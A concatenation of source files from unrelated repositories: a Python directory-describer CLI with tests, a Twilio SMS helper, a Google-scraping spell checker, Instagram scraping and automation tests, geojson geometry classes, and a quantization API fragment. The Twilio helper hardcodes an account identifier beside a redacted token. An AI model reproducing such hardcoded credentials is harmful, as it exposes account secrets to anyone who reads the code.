with open(path) as f:
return f.read()
def is_badge_line(node: marko.block.Paragraph) -> bool:
if not hasattr(node, "children"):
return False
for k in node.children:
if isinstance(k, marko.inline.LineBreak):
continue
elif isinstance(k, marko.inline.Link):
if (
k.children
and len(k.children) == 1
and isinstance(k.children[0], marko.inline.Image)
):
continue
else:
return True
elif isinstance(k, marko.inline.Image):
continue
elif not get_string_from_markdown_ast(k).strip():
continue
else:
logger.debug(
"found non-badge element {} {}", get_string_from_markdown_ast(k), k
)
return False
return True
def get_string_from_markdown_ast(
node: marko.inline.InlineElement
| str
| marko.block.Heading
| marko.block.SetextHeading,
base=0,
) -> str:
# run again on string
if isinstance(node, marko.inline.RawText):
k = get_string_from_markdown_ast(node.children, base + 1)
# use space to replace linebreaks in order to save space
elif isinstance(node, marko.inline.LineBreak):
k = " "
# skip image alt texts
elif isinstance(node, marko.inline.Image):
k = ""
# skip blocks
elif isinstance(node, (marko.block.LinkRefDef, marko.block.ThematicBreak)):
k = ""
elif isinstance(node, marko.block.BlankLine):
k = " "
elif isinstance(node, str):
k = node
else:
k = "".join([get_string_from_markdown_ast(t, base + 1) for t in node.children])
return k
def get_description_from_readmeMd(markdown: str) -> Description:
parser = marko.parser.Parser()
ast = cast(marko.block.BlockElement, parser.parse(markdown))
description: Description = {"title": "", "subtitle": ""}
for block in ast.children:
# skip blank lines
if isinstance(block, marko.block.BlankLine):
continue
# skip html stuff
# TODO: add html tag parsing
elif isinstance(block, marko.block.HTMLBlock):
continue
# skip lines with only images
elif is_badge_line(block):
continue
# read headings
# TODO: find title & subtitle on heading type (H1/H2/H3)
elif (
isinstance(block, (marko.block.Heading, marko.block.SetextHeading))
and block.children
):
if description["title"] != "":
continue
description["title"] = get_string_from_markdown_ast(block).strip()
# read descriptions
else:
description["subtitle"] = get_string_from_markdown_ast(block).strip()
logger.trace('read description "{}"', description["subtitle"])
break
return description
def get_description_from_packageJson(package: str) -> Description:
"""Gets description about a directory using its node package.json"""
v = json.loads(package)
description: Description = {"title": "", "subtitle": ""}
if "name" in v:
description["title"] = v["name"].strip()
logger.opt(colors=True).debug(
f"found name in package.json <u>{description['title']}</u>"
)
if "description" in v:
description["subtitle"] = v["description"].strip()
logger.opt(colors=True).debug(
f"found subtitle in package.json <u>{description['subtitle']}</u>"
)
return description
def get_description_from_pyprojectToml(string: str) -> Description:
meta = toml.loads(string)
description: Description = {"title": "", "subtitle": ""}
if "tool" in meta:
if "poetry" in meta["tool"]:
if "name" in meta["tool"]["poetry"]:
description["title"] = meta["tool"]["poetry"]["name"].strip()
logger.opt(colors=True).debug(
f"found name in poetry.toml <u>{description['title']}</u>"
)
if "description" in meta["tool"]["poetry"]:
description["subtitle"] = meta["tool"]["poetry"]["description"].strip()
logger.opt(colors=True).debug(
f"found description in poetry.toml <u>{description['subtitle']}</u>"
)
return description
def get_description_from_readmeRst(filestream) -> Description:
rx = re.compile(r"([\S])\1{3,}")
lastline = ""
while 1:
line = filestream.readline().strip()
if rx.match(line):
logger.opt(colors=True).debug(
f"found title line in readme.rst <u>{lastline}</u>"
)
return {"title": lastline, "subtitle": ""}
lastline = line
return {"title": "", "subtitle": ""}
def get_description_from_poetsJson(string) -> Description:
o = json.loads(string)
d: Description = {"title": "", "subtitle": ""}
if "title" in o:
d["title"] = o["title"]
if "subtitle" in o:
d["subtitle"] = o["subtitle"]
return d
def join_title_and_subtitle(d: Description, ansi: bool = False) -> str:
title, subtitle = d["title"], d["subtitle"]
final_description = ""
if title:
if ansi:
final_description += click.style(title, bold=True, underline=True)
else:
final_description += title
if subtitle:
if len(subtitle) > 82:
subtitle = subtitle[:82] + "..."
if final_description:
final_description += " - " + subtitle
else:
final_description += subtitle
return final_description
def get_dir_info(path: str) -> dict[str, Description]:
"""Get full description of dir `path`"""
p = os.listdir(path)
descriptions = {}
for i in p:
logger.trace(f"reading {i}")
if i.lower() == "readme.md":
descriptions[SOURCE_README_MD] = get_description_from_readmeMd(
file_to_string(os.path.join(path, i))
)
elif i.lower() == "package.json":
descriptions[SOURCE_PACKAGE_JSON] = get_description_from_packageJson(
file_to_string(os.path.join(path, i))
)
elif i.lower() == "pyproject.toml":
descriptions[SOURCE_PROJECT_TOML] = get_description_from_pyprojectToml(
file_to_string(os.path.join(path, i))
)
elif i.lower() == "readme.rst":
with open(os.path.join(path, i)) as f:
descriptions[SOURCE_README_RST] = get_description_from_readmeRst(f)
elif i.lower() == ".poets.json":
descriptions[SOURCE_POETS_JSON] = get_description_from_poetsJson(
file_to_string(os.path.join(path, i))
)
return descriptions
def filter_description(descriptions: dict[str, Description]) -> Description:
"""Uses the priority table to pick the best title and description"""
title = ""
subtitle = ""
for source in DESCRIPTION_SOURCE_PRIORITY:
if source in descriptions:
if "title" in descriptions[source]:
if descriptions[source]["title"]:
logger.debug(f"using {source} for title")
title = descriptions[source]["title"]
break
for source in DESCRIPTION_SOURCE_PRIORITY:
if source in descriptions:
if "subtitle" in descriptions[source]:
if descriptions[source]["subtitle"]:
logger.debug(f"using {source} for subtitle")
subtitle = descriptions[source]["subtitle"]
break
return {"title": title, "subtitle": subtitle}
def thread_worker(q: Queue, path, u, f=None) -> None:
while 1:
a = q.get()
logger.info(f"getting info for {a}")
descriptions = get_dir_info(os.path.join(path, a))
u[a + "/"] = filter_description(descriptions)
logger.info(f'info: {u[a+"/"]}')
q.task_done()
if f:
f.update(1)
def loop_dirs(
dirs: Iterable[str], path: str, thread: int, f=None
) -> dict[str, Description]:
u: dict[str, Description] = {}
if thread and thread > 0:
q = Queue()
for p in dirs:
q.put(p)
threads = []
for _ in range(thread):
worker = threading.Thread(
target=thread_worker, args=(q, path, u, f), daemon=True
)
worker.start()
threads.append(worker)
q.join()
else:
for a in dirs:
logger.info(f"getting info for {a}")
u[a + "/"] = filter_description(get_dir_info(os.path.join(path, a)))
logger.info(f'info: {u[a+"/"]}')
return u
# @logger.catch
@click.command(
help="A cli app to show directories with description. Works best with documented directories.",
add_help_option=False,
)
@click.argument("path", type=click.Path(exists=True, readable=True), default=".")
@click.option("--ansi/--no-ansi", default=True, help="Disable ansi colored output")
@click.option("--dry", "-D", default=False, is_flag=True, help="Gide final stdout")
@click.option("--progress/--no-progress", default=True, help="Disable progress bar")
@click.option("-v", "--verbose", count=True, help="Set logging level, repeat for more")
@click.option(
"-x", "--thread", type=int, default=0, help="Number of threads, 0 to disable"
)
@click.help_option("--help", "-h")
def main(ansi: bool, verbose: int, dry: bool, progress: bool, path: str, thread: int):
if verbose > len(LOGGING_LEVELS):
verbose = len(LOGGING_LEVELS)
logger_config = {
"handlers": [
{
"sink": sys.stdout,
"format": "<green>{time:HH:mm:ss.SSS}</green> - <lvl>{level}</lvl>: {message}",
"level": LOGGING_LEVELS[verbose],
},
],
}
logger.configure(**logger_config)
logger.info(f"ansi status: {ansi}")
logger.info(f"path: {path}")
dirs = [o for o in os.listdir(path) if os.path.isdir(os.path.join(path, o))]
if progress and not dry:
if thread:
with click.progressbar(length=len(dirs), label="Parsing directories") as f:
u = loop_dirs(dirs, path, thread, f)
else:
with click.progressbar(dirs, label="Parsing directories") as di:
u = loop_dirs(di, path, thread)
else:
u = loop_dirs(dirs, path, thread)
if not dry:
for l in sorted(u):
if len(u[l]) >= 1:
if ansi:
o = (
click.style(l, fg="blue")
+ " "
+ join_title_and_subtitle(u[l], ansi=ansi)
)
else:
o = l + " " + join_title_and_subtitle(u[l], ansi=ansi)
else:
if ansi:
o = click.style(l, fg="blue")
else:
o = l
click.echo(o)
if __name__ == "__main__":
main()
```
#### File: poets/tests/test_unit.py
```python
import io
import sys
import marko
import pytest
from fixtures import (
EXAMPLE_README_MD1,
EXAMPLE_README_MD2,
EXAMPLE_README_MD3,
EXAMPLE_README_MD4,
EXAMPLE_README_RST1,
EXAMPLE_POETS_JSON1,
)
from poetspy.poets import (
Description,
file_to_string,
get_description_from_readmeMd,
get_description_from_readmeRst,
get_description_from_poetsJson,
get_string_from_markdown_ast,
is_badge_line,
join_title_and_subtitle,
logger,
)
def test_readme_md():
assert get_description_from_readmeMd(EXAMPLE_README_MD1) == {
"title": "PoetsPy",
"subtitle": "A great python ls alternative",
}
assert get_description_from_readmeMd(EXAMPLE_README_MD2) == {
"title": "Title",
"subtitle": "this is just a random readme",
}
assert get_description_from_readmeMd(EXAMPLE_README_MD3) == {
"title": "Node.JS Chat",
"subtitle": "This is a node.js chat application powered by SockJS and Express that provides the main functions you'd expect from a chat, such as emojis, private messages, an admin system, etc.",
}
assert get_description_from_readmeMd(EXAMPLE_README_MD4) == {
"title": "Color LS",
"subtitle": "A Ruby script that colorizes the ls output with color and icons. Here are the screenshots of working example on an iTerm2 terminal (Mac OS), oh-my-zsh with powerlevel9k theme and powerline nerd-font + awesome-config font with the Solarized Dark color theme.",
}
def test_path_reader(tmp_path):
u = tmp_path / "test1.txt"
u.write_text("ABCDefgHijklmn")
assert file_to_string(str(u)) == "ABCDefgHijklmn"
v = tmp_path / "test2.txt"
v.write_text("happy birthday!你好!")
assert file_to_string(v) == "happy birthday!你好!"
def f(a, b) -> Description:
return {"title": a, "subtitle": b}
def test_title_selection(snapshot):
assert (
join_title_and_subtitle(f("Poetspy", "Another ls alternative"), False)
== "Poetspy - Another ls alternative"
)
assert (
join_title_and_subtitle(f("", "Another ls alternative"), False)
== "Another ls alternative"
)
assert (
join_title_and_subtitle(f("Poetspy", "j" * 99), False)
== "Poetspy - " + "j" * 82 + "..."
)
assert (
join_title_and_subtitle(f("Poetspy", "Another ls alternative"), True)
== snapshot
)
def test_poets_json():
assert get_description_from_poetsJson(EXAMPLE_POETS_JSON1) == {
"title": "Hanasu",
"subtitle": "A p2p chat app",
}
def test_readme_rst():
i = io.StringIO(EXAMPLE_README_RST1)
assert get_description_from_readmeRst(i) == {"title": "pingtop", "subtitle": ""}
def test_get_readme_text():
parser = marko.parser.Parser()
ast = parser.parse("**Hello** *World!*").children[0]
assert get_string_from_markdown_ast(ast) == "Hello World!"
ast = parser.parse(" ").children[0]
assert get_string_from_markdown_ast(ast) == " "
ast = parser.parse("Hello  *World!*").children[0]
assert get_string_from_markdown_ast(ast) == "Hello World!"
ast = parser.parse("Hello [link](ref) *World!*").children[0]
assert get_string_from_markdown_ast(ast) == "Hello link World!"
ast = parser.parse("# Hello [World!](there)").children[0]
assert get_string_from_markdown_ast(ast) == "Hello World!"
ast = parser.parse("Hello\n[World!](there)").children[0]
assert get_string_from_markdown_ast(ast) == "Hello World!"
# Line with no text is badge line
ast = parser.parse("![]() []()").children[0]
assert is_badge_line(ast) == True
# Images with alt text are badges
ast = parser.parse(" ").children[0]
assert is_badge_line(ast) == True
# Text between images is not badge line
ast = parser.parse(" some text").children[0]
assert is_badge_line(ast) == False
# Images with link is badge line
ast = parser.parse("[](other_source) ").children[0]
assert is_badge_line(ast) == True
# Empty line is not badge line
ast = parser.parse(" ").children[0]
assert is_badge_line(ast) == False
``` |
{
"source": "joker123098/Medicare",
"score": 2
} |
#### File: backend/diagnose/twilio.py
```python
import os
from twilio.rest import Client
def send_msg(tousr,body):
account_sid = 'SK7408a1a9c65e8f94ac82d0f0eef4075e'
auth_token = '<PASSWORD>'
client = Client(account_sid, auth_token)
message = client.messages \
.create(
body=body,
messaging_service_sid='MG9752274e9e519418a7406176694466fa',
to=tousr
)
print(message.sid)
``` |
{
"source": "joker153/amalpromass",
"score": 3
} |
#### File: joker153/amalpromass/spell.py
```python
import urllib.parse
import re
from bs4 import BeautifulSoup as bs
import requests
def Check(q):
raw_query=q #Preserving original string to return if error is excepted
q = str(str.lower(q)).strip()
url = "http://www.google.com/search?q=" + urllib.parse.quote(q)
source=requests.get(url).text
soup=bs(source,'lxml')
ans = soup.find('a', attrs={'class' : 'spell'})
try:
result = repr(ans.contents)
result = result.replace("u'","")
result = result.replace("/","")
result = result.replace("<b>","")
result = result.replace("<i>","")
result = re.sub('[^A-Za-z0-9\s]+', '', result)
result = re.sub(' +',' ',result)
except AttributeError:
result = raw_query
return result
``` |
{
"source": "joker2017/InstaParser",
"score": 2
} |
#### File: InstaParser/tests/anon.py
```python
import pytest
from random import randint, choice
from instaparser.agents import Agent
from instaparser.entities import Account, Media, Location, Tag
from tests.settings import accounts, locations, photos, photo_sets, tags, videos
def test_update():
anon = Agent()
anon.update()
assert(not getattr(anon, "_rhx_gis", None) is None)
assert(not getattr(anon, "_csrf_token", None) is None)
@pytest.mark.parametrize("username", accounts)
def test_update_account(username):
anon = Agent()
account = Account(username)
data = anon.update(account)
assert(not data is None)
assert(not account.id is None)
assert(not account.full_name is None)
assert(not account.profile_pic_url is None)
assert(not account.profile_pic_url_hd is None)
assert(not account.biography is None)
assert(not account.follows_count is None)
assert(not account.followers_count is None)
assert(not account.media_count is None)
assert(not account.is_private is None)
assert(not account.is_verified is None)
assert(not account.country_block is None)
Account.clear_cache()
@pytest.mark.parametrize("shortcode", photos)
def test_update_photo(shortcode):
anon = Agent()
photo = Media(shortcode)
data = anon.update(photo)
assert(not photo.is_video)
Media.clear_cache()
@pytest.mark.parametrize("shortcode", photo_sets)
def test_update_photo_set(shortcode):
anon = Agent()
photo_set = Media(shortcode)
data = anon.update(photo_set)
assert(not photo_set.is_video)
Media.clear_cache()
@pytest.mark.parametrize("shortcode", videos)
def test_update_video(shortcode):
anon = Agent()
video = Media(shortcode)
data = anon.update(video)
assert(video.is_video)
Media.clear_cache()
@pytest.mark.parametrize("id", locations)
def test_update_location(id):
anon = Agent()
location = Location(id)
data = anon.update(location)
Location.clear_cache()
@pytest.mark.parametrize("name", tags)
def test_update_tag(name):
anon = Agent()
tag = Tag(name)
data = anon.update(tag)
Tag.clear_cache()
@pytest.mark.parametrize("count,username",
[(randint(100, 500), choice(accounts)) for i in range(3)])
def test_get_media_account(count, username):
anon = Agent()
account = Account(username)
data, pointer = anon.get_media(account, count=count)
assert(min(account.media_count, count) == len(data))
assert((pointer is None) == (account.media_count <= count))
Account.clear_cache()
Media.clear_cache()
@pytest.mark.parametrize("count,id", [(randint(100, 500), choice(locations)) for i in range(3)])
def test_get_media_location(count, id):
anon = Agent()
location = Location(id)
data, pointer = anon.get_media(location, count=count)
assert(min(location.media_count, count) == len(data))
assert((pointer is None) == (location.media_count <= count))
Location.clear_cache()
Media.clear_cache()
@pytest.mark.parametrize("count,name", [(randint(100, 500), choice(tags)) for i in range(3)])
def test_get_media_tag(count, name):
anon = Agent()
tag = Tag(name)
data, pointer = anon.get_media(tag, count=count)
assert(min(tag.media_count, count) == len(data))
assert((pointer is None) == (tag.media_count <= count))
Tag.clear_cache()
Media.clear_cache()
@pytest.mark.parametrize("shortcode", [choice(photos), choice(photo_sets), choice(videos)])
def test_get_likes(shortcode):
anon = Agent()
media = Media(shortcode)
data, pointer = anon.get_likes(media)
assert(media.likes_count >= len(data))
Media.clear_cache()
@pytest.mark.parametrize("count,shortcode",
[(randint(100, 500), shortcode) \
for shortcode in [choice(photos), choice(photo_sets), choice(videos)]])
def test_get_comments(count, shortcode):
anon = Agent()
media = Media(shortcode)
data, pointer = anon.get_comments(media, count=count)
assert(min(media.comments_count, count) == len(data))
assert((pointer is None) == (media.likes_count <= count))
Media.clear_cache()
@pytest.mark.parametrize("count,username", [(randint(1, 10), choice(accounts))])
def test_get_media_account_pointer(count, username):
anon = Agent()
account = Account(username)
pointer = None
data = []
for i in range(count):
tmp, pointer = anon.get_media(account, pointer=pointer)
data.extend(tmp)
assert((pointer is None) == (account.media_count <= count))
Account.clear_cache()
Media.clear_cache()
@pytest.mark.parametrize("count,id", [(randint(1, 10), choice(locations))])
def test_get_media_location_pointer(count, id):
anon = Agent()
location = Location(id)
pointer = None
data = []
for i in range(count):
tmp, pointer = anon.get_media(location, pointer=pointer)
data.extend(tmp)
assert((pointer is None) == (location.media_count <= count))
Location.clear_cache()
Media.clear_cache()
@pytest.mark.parametrize("count,name", [(randint(1, 10), choice(tags))])
def test_get_media_tag_pointer(count,name):
anon = Agent()
tag = Tag(name)
pointer = None
data = []
for i in range(count):
tmp, pointer = anon.get_media(tag, pointer=pointer)
data.extend(tmp)
assert((pointer is None) == (tag.media_count <= count))
Tag.clear_cache()
Media.clear_cache()
@pytest.mark.parametrize("count,shortcode", [(randint(1, 10), shortcode) for shortcode in [choice(photos), choice(photo_sets), choice(videos)]])
def test_get_comments_pointer(count, shortcode):
anon = Agent()
media = Media(shortcode)
pointer = None
data = []
for i in range(count):
tmp, pointer = anon.get_comments(media, pointer=pointer)
data.extend(tmp)
assert((pointer is None) == (media.likes_count <= count))
Media.clear_cache()
```
#### File: InstaParser/tests/auth.py
```python
import pytest
from random import randint, choice
from instaparser.agents import AgentAccount
from instaparser.entities import Account, Media, Location, Tag, Comment
from tests.settings import accounts, creds, locations, photos, photo_sets, tags, videos
def parametrize(*args):
result = []
for variable in zip(*args):
result.append((creds["login"], creds["password"], *variable))
return result
@pytest.mark.parametrize("login,password", [(creds["login"], creds["password"])])
def test_auth(login, password):
agent = AgentAccount(login, password)
Account.clear_cache()
@pytest.mark.parametrize("login,password", [(creds["login"], creds["password"])])
def test_update(login, password):
agent = AgentAccount(login, password)
agent.update()
assert(not getattr(agent, "id") is None)
Account.clear_cache()
@pytest.mark.parametrize("login,password,username", parametrize(accounts))
def test_update_account(login, password, username):
agent = AgentAccount(login, password)
account = Account(username)
data = agent.update(account)
assert(not data is None)
Account.clear_cache()
@pytest.mark.parametrize("login,password,shortcode", parametrize(photos))
def test_update_photo(login, password, shortcode):
agent = AgentAccount(login, password)
photo = Media(shortcode)
data = agent.update(photo)
assert(not photo.is_video)
Media.clear_cache()
@pytest.mark.parametrize("login,password,shortcode", parametrize(photo_sets))
def test_update_photo_set(login, password, shortcode):
agent = AgentAccount(login, password)
photo_set = Media(shortcode)
data = agent.update(photo_set)
assert(not photo_set.is_video)
Media.clear_cache()
@pytest.mark.parametrize("login,password,shortcode", parametrize(videos))
def test_update_video(login, password, shortcode):
agent = AgentAccount(login, password)
video = Media(shortcode)
data = agent.update(video)
assert(video.is_video)
Media.clear_cache()
@pytest.mark.parametrize("login,password,id", parametrize(locations))
def test_update_location(login, password, id):
agent = AgentAccount(login, password)
location = Location(id)
data = agent.update(location)
Location.clear_cache()
@pytest.mark.parametrize("login,password,name", parametrize(tags))
def test_update_tag(login, password, name):
agent = AgentAccount(login, password)
tag = Tag(name)
data = agent.update(tag)
Tag.clear_cache()
@pytest.mark.parametrize("login,password,count,username",
parametrize([randint(100, 500) for i in range(3)],
[choice(accounts) for i in range(3)]))
def test_get_media_account(login, password, count, username):
agent = AgentAccount(login, password)
account = Account(username)
data, pointer = agent.get_media(account, count=count)
assert(min(account.media_count, count) == len(data))
assert((pointer is None) == (account.media_count <= count))
Account.clear_cache()
Media.clear_cache()
@pytest.mark.parametrize("login,password,count,id",
parametrize([randint(100, 500) for i in range(3)],
[choice(locations) for i in range(3)]))
def test_get_media_location(login, password, count, id):
agent = AgentAccount(login, password)
location = Location(id)
data, pointer = agent.get_media(location, count=count)
assert(min(location.media_count, count) == len(data))
assert((pointer is None) == (location.media_count <= count))
Location.clear_cache()
Media.clear_cache()
@pytest.mark.parametrize("login,password,count,name",
parametrize([randint(100, 500) for i in range(3)],
[choice(tags) for i in range(3)]))
def test_get_media_tag(login, password, count, name):
agent = AgentAccount(login, password)
tag = Tag(name)
data, pointer = agent.get_media(tag, count=count)
assert(min(tag.media_count, count) == len(data))
assert((pointer is None) == (tag.media_count <= count))
Tag.clear_cache()
Media.clear_cache()
@pytest.mark.parametrize("login,password,count,shortcode",
parametrize([randint(100, 500) for i in range(3)],
[choice(photos+photo_sets+videos)]))
def test_get_likes(login, password, count, shortcode):
agent = AgentAccount(login, password)
media = Media(shortcode)
data, pointer = agent.get_likes(media, count=count)
assert(min(media.likes_count, count) == len(data))
assert((pointer is None) == (media.likes_count <= count))
Media.clear_cache()
@pytest.mark.parametrize("login,password,count,username",
parametrize([randint(100, 500) for i in range(3)],
[choice(accounts) for i in range(3)]))
def test_get_follows(login, password, count, username):
agent = AgentAccount(login, password)
account = Account(username)
data, pointer = agent.get_follows(account, count=count)
assert(min(account.follows_count, count) == len(data))
assert((pointer is None) == (account.follows_count <= count))
Account.clear_cache()
@pytest.mark.parametrize("login,password,count,username",
parametrize([randint(100, 500) for i in range(3)],
[choice(accounts) for i in range(3)]))
def test_get_followers(login, password, count, username):
agent = AgentAccount(login, password)
account = Account(username)
data, pointer = agent.get_followers(account, count=count)
assert(min(account.followers_count, count) == len(data))
assert((pointer is None) == (account.followers_count <= count))
Account.clear_cache()
@pytest.mark.parametrize("login,password,count", parametrize([randint(100, 500) for i in range(3)]))
def test_get_feed(login, password, count):
agent = AgentAccount(login, password)
data, pointer = agent.feed(count=count)
assert(count >= len(data))
Account.clear_cache()
@pytest.mark.parametrize("login,password,count,username",
parametrize([randint(1, 10)], [choice(accounts)]))
def test_get_media_account_pointer(login, password, count, username):
agent = AgentAccount(login, password)
account = Account(username)
pointer = None
data = []
for i in range(count):
tmp, pointer = agent.get_media(account, pointer=pointer)
data.extend(tmp)
assert((pointer is None) == (account.media_count <= count))
Account.clear_cache()
Media.clear_cache()
@pytest.mark.parametrize("login,password,count,id",
parametrize([randint(1, 10)], [choice(locations)]))
def test_get_media_location_pointer(login, password, count, id):
agent = AgentAccount(login, password)
location = Location(id)
pointer = None
data = []
for i in range(count):
tmp, pointer = agent.get_media(location, pointer=pointer)
data.extend(tmp)
assert((pointer is None) == (location.media_count <= count))
Account.clear_cache()
Media.clear_cache()
Location.clear_cache()
@pytest.mark.parametrize("login,password,count,name",
parametrize([randint(1, 10)], [choice(tags)]))
def test_get_media_tag_pointer(login, password, count, name):
agent = AgentAccount(login, password)
tag = Tag(name)
pointer = None
data = []
for i in range(count):
tmp, pointer = agent.get_media(tag, pointer=pointer)
data.extend(tmp)
assert((pointer is None) == (tag.media_count <= count))
Account.clear_cache()
Media.clear_cache()
Tag.clear_cache()
@pytest.mark.parametrize("login,password,count,shortcode",
parametrize([randint(1, 10)], [choice(photos+photo_sets+videos)]))
def test_get_likes_pointer(login, password, count, shortcode):
agent = AgentAccount(login, password)
media = Media(shortcode)
pointer = None
data = []
for i in range(count):
tmp, pointer = agent.get_likes(media, pointer=pointer)
data.extend(tmp)
assert((pointer is None) == (media.likes_count <= count))
Account.clear_cache()
Media.clear_cache()
@pytest.mark.parametrize("login,password,count,username",
parametrize([randint(1, 10)], [choice(accounts)]))
def test_get_follows_pointer(login, password, count, username):
agent = AgentAccount(login, password)
account = Account(username)
pointer = None
data = []
for i in range(count):
tmp, pointer = agent.get_follows(account, pointer=pointer)
data.extend(tmp)
assert((pointer is None) == (account.follows_count <= count))
Account.clear_cache()
@pytest.mark.parametrize("login,password,count,username",
parametrize([randint(1, 10)], [choice(accounts)]))
def test_get_followers_pointer(login, password, count, username):
agent = AgentAccount(login, password)
account = Account(username)
pointer = None
data = []
for i in range(count):
tmp, pointer = agent.get_followers(account, pointer=pointer)
data.extend(tmp)
assert((pointer is None) == (account.followers_count <= count))
Account.clear_cache()
@pytest.mark.parametrize("login,password,count", parametrize([randint(1, 10)]))
def test_get_feed_pointer(login, password, count):
agent = AgentAccount(login, password)
pointer = None
data = []
for i in range(count):
tmp, pointer = agent.feed(pointer=pointer)
data.extend(tmp)
Account.clear_cache()
Media.clear_cache()
@pytest.mark.parametrize("login,password,shortcode", parametrize(photos))
def test_like_unlike_photo(login, password, shortcode):
agent = AgentAccount(login, password)
photo = Media(shortcode)
assert(agent.like(photo))
assert(agent.unlike(photo))
Account.clear_cache()
Media.clear_cache()
@pytest.mark.parametrize("login,password,shortcode", parametrize(photo_sets))
def test_like_unlike_photo_set(login, password, shortcode):
agent = AgentAccount(login, password)
photo_set = Media(shortcode)
assert(agent.like(photo_set))
assert(agent.unlike(photo_set))
Account.clear_cache()
Media.clear_cache()
@pytest.mark.parametrize("login,password,shortcode", parametrize(videos))
def test_like_unlike_video(login, password, shortcode):
agent = AgentAccount(login, password)
video = Media(shortcode)
assert(agent.like(video))
assert(agent.unlike(video))
Account.clear_cache()
Media.clear_cache()
@pytest.mark.parametrize("login,password,username", parametrize(accounts))
def test_follow_unfollow(login, password, username):
agent = AgentAccount(login, password)
account = Account(username)
assert(agent.follow(account))
assert(agent.unfollow(account))
Account.clear_cache()
@pytest.mark.parametrize("login,password,shortcode",
parametrize([choice(photos), choice(photo_sets), choice(videos)]))
def test_comment(login, password, shortcode):
agent = AgentAccount(login, password)
media = Media(shortcode)
comment = agent.add_comment(media, "test")
agent.delete_comment(comment)
Account.clear_cache()
Media.clear_cache()
Comment.clear_cache()
``` |
{
"source": "joker234/geojson",
"score": 3
} |
#### File: geojson/geojson/geometry.py
```python
import sys
from decimal import Decimal
from numbers import Number
from geojson.base import GeoJSON
if sys.version_info[0] == 3:
# Python 3.x has no long type
_JSON_compliant_types = (float, int, Decimal)
else:
_JSON_compliant_types = (float, int, Decimal, long) # noqa
class Geometry(GeoJSON):
"""
Represents an abstract base class for a WGS84 geometry.
"""
def __init__(self, coordinates=None, validate=False, precision=6, **extra):
"""
Initialises a Geometry object.
:param coordinates: Coordinates of the Geometry object.
:type coordinates: tuple or list of tuple
:param validate: Raise exception if validation errors are present?
:type validate: boolean
:param precision: Number of decimal places for lat/lon coords.
:type precision: integer
"""
super(Geometry, self).__init__(**extra)
self["coordinates"] = self.clean_coordinates(
coordinates or [], precision)
if validate:
errors = self.errors()
if errors:
raise ValueError('{}: {}'.format(errors, coordinates))
@classmethod
def clean_coordinates(cls, coords, precision):
if isinstance(coords, cls):
return coords['coordinates']
new_coords = []
if isinstance(coords, Geometry):
coords = [coords]
for coord in coords:
if isinstance(coord, (list, tuple)):
new_coords.append(cls.clean_coordinates(coord, precision))
elif isinstance(coord, Geometry):
new_coords.append(coord['coordinates'])
elif isinstance(coord, _JSON_compliant_types):
new_coords.append(round(coord, precision))
else:
raise ValueError("%r is not a JSON compliant number" % coord)
return new_coords
class GeometryCollection(GeoJSON):
"""
Represents an abstract base class for collections of WGS84 geometries.
"""
def __init__(self, geometries=None, **extra):
super(GeometryCollection, self).__init__(**extra)
self["geometries"] = geometries or []
def errors(self):
errors = [geom.errors() for geom in self['geometries']]
return [err for err in errors if err]
def __getitem__(self, key):
try:
return self.get("geometries", ())[key]
except (KeyError, TypeError, IndexError):
return super(GeoJSON, self).__getitem__(key)
# Marker classes.
def check_point(coord):
if not isinstance(coord, list):
return 'each position must be a list'
if len(coord) not in (2, 3):
return 'a position must have exactly 2 or 3 values'
for number in coord:
if not isinstance(number, Number):
return 'a position cannot have inner positions'
class Point(Geometry):
def errors(self):
return check_point(self['coordinates'])
class MultiPoint(Geometry):
def errors(self):
return self.check_list_errors(check_point, self['coordinates'])
def check_line_string(coord):
if not isinstance(coord, list):
return 'each line must be a list of positions'
if len(coord) < 2:
return ('the "coordinates" member must be an array of '
'two or more positions')
for pos in coord:
error = check_point(pos)
if error:
return error
class LineString(MultiPoint):
def errors(self):
return check_line_string(self['coordinates'])
class MultiLineString(Geometry):
def errors(self):
return self.check_list_errors(check_line_string, self['coordinates'])
def check_polygon(coord):
if not isinstance(coord, list):
return 'Each polygon must be a list of linear rings'
if not all(isinstance(elem, list) for elem in coord):
return "Each element of a polygon's coordinates must be a list"
lengths = all(len(elem) >= 4 for elem in coord)
if lengths is False:
return 'Each linear ring must contain at least 4 positions'
isring = all(elem[0] == elem[-1] for elem in coord)
if isring is False:
return 'Each linear ring must end where it started'
class Polygon(Geometry):
def errors(self):
return check_polygon(self['coordinates'])
class MultiPolygon(Geometry):
def errors(self):
return self.check_list_errors(check_polygon, self['coordinates'])
class Default(object):
"""
GeoJSON default object.
"""
``` |
{
"source": "joker23/pydrive",
"score": 3
} |
#### File: pydrive/google/drive_util.py
```python
import os
### drive_util
### has_mimetype
# Determines whether drive supports this mimetype upload
def has_mimetype(path):
# list of not supported types
not_supported = ['md'];
ext = path.split("/")[-1]
if (ext[0] is '.' or '.' not in ext):
return 0
elif (ext.split('.')[-1] in not_supported):
return 0
else:
return 1
``` |
{
"source": "joker255x/ppq",
"score": 2
} |
#### File: ppq/api/__init__.py
```python
import os
from typing import Any, Callable, List
import torch
from ppq.core import (NetworkFramework, TargetPlatform, empty_ppq_cache,
ppq_warning)
from ppq.executor import TorchExecutor
from ppq.IR import (BaseGraph, GraphCommand, GraphCommandType, GraphFormatter,
GraphMerger)
from ppq.IR.morph import GraphDeviceSwitcher
from ppq.parser import dump_graph_to_file, load_graph
from ppq.quantization.quantizer import (BaseQuantizer, ExtQuantizer,
NXP_Quantizer, PPL_DSP_Quantizer,
PPLCUDAQuantizer, TensorRTQuantizer)
from ppq.scheduler import DISPATCHER_TABLE
from torch.utils.data import DataLoader
from .setting import *
QUANTIZER_COLLECTION = {
TargetPlatform.DSP_INT8: PPL_DSP_Quantizer,
TargetPlatform.TRT_INT8: TensorRTQuantizer,
TargetPlatform.NXP_INT8: NXP_Quantizer,
TargetPlatform.PPL_CUDA_INT8: PPLCUDAQuantizer,
TargetPlatform.EXTENSION: ExtQuantizer
}
def load_onnx_graph(onnx_import_file: str, setting: QuantizationSetting) -> BaseGraph:
"""
从一个指定位置加载 onnx 计算图
load onnx graph from the specified location
Args:
onnx_import_file (str): onnx 计算图的保存位置 the specified location
Returns:
BaseGraph: 解析 onnx 获得的 ppq 计算图对象 the parsed ppq IR graph
"""
ppq_ir = load_graph(onnx_import_file, from_framework=NetworkFramework.ONNX)
return format_graph(graph=ppq_ir, setting=setting)
def load_caffe_graph(prototxt_path: str, caffemodel_path: str,
setting: QuantizationSetting) -> BaseGraph:
"""
从一个指定位置加载 caffe 计算图
load caffe graph from the specified location
Args:
prototxt_path (str): caffe prototxt的保存位置 the specified location of caffe prototxt
